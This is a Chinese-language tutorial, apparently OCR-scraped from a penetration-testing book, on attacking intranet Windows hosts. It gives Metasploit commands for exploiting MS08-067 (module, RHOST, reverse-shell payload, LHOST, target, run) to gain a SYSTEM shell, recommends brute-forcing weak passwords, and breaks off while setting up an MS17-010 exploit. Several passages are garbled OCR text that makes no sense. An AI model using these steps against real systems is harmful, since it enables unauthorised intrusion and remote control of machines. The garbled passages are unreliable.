内网服务器MS08-067最常见的系统漏洞利用方法


     内网常见攻击操作系统漏洞,操作系统是管理和控制计算机硬件与软件资源的计算机程序,是直接运行在“裸 机”上的最基本的系统软件,任何其他软件都必须在操作系统的支持下才能运行。操作系 统漏洞指的是计算机操作系统本身所存在的问题或技术缺陷,操作系统漏洞会影响到个人 电脑终端、服务器等。


大家应该都知道,在对内网的攻击中,除了收集资产和针对Web系统进行攻击外, 还会对内网终端系统的漏洞进行攻击,如经典的MS08-067和MS17-010漏洞等。当然除 了这些可以直接进行攻击的漏洞外,还有以对远程登录端口进行弱口令暴力破解的方式进行攻击。


众所周知,很多的终端因为本身在内网中,认为是比较安全的或者是不能上网且无 法自动更新补丁的,导致不能及时更新系统漏洞补丁,这种情况在内网中是很普遍的。不 过在内网中弱口令更是一个十分大的隐患,如123456、11111及姓名拼音等应该都是在 内网终端中非常常见的,而且很多的终端使用者为了操作方便直接使用的是空密码,对于 这种情况通常会使用一些暴力破解工具进行检测,如果获取到一个弱口令,那么下一步的 攻击会变得简单许多。对此,在这一节挑选了MS08-067和MS17-010这两个经典的操作 系统漏洞进行介绍的演示。


MS08-067 漏洞是很经典的远程溢出漏洞,下面来介绍下如何使用 MSF 利用此漏 洞。首先运行“search 08-067”命令搜索 MS08-067 漏洞利用模块,然后运行命令“use exploit/windows/smb/ms08_067_netapi"并使用漏洞利用模块"exploit/windows/smb/ms08 067 netapi”,并运行命令“set RHOST 10.211.55.22”对其进行配置,使用漏洞利用模块。


运行命令“show options”查看所需配置。运行命令“set payload generic/shell reverse top”选择 Payload,如图8-2所示,再运WinParlent with isenerit/ shell运行命令“set LHOST 10.211.55.21”和“set target 3”配置监听主机及目标,然后运 高的System权限。 行命令“run”并开始攻击,发现攻击成功,如图8-3所示,得到了一个Shell,获得了Startedreverse ICP handler on 10.211.55.211 4444 10.211.55.72.445 Attersoting to visser the wiser stuty攻击成功。


MS17-010 漏洞是著名的远程溢出漏洞,下面通过 MSF 演示如何利用此漏洞。首 先,运行命令“ search 17-010”搜索 MS17-010 漏洞利用模块,然后运行命令“use exploit/windows/smb/ms17_010_psexec"并使用漏洞利用模块"exploit/windows/smb/ ms17_010_psexec",选择攻击模块。

分享: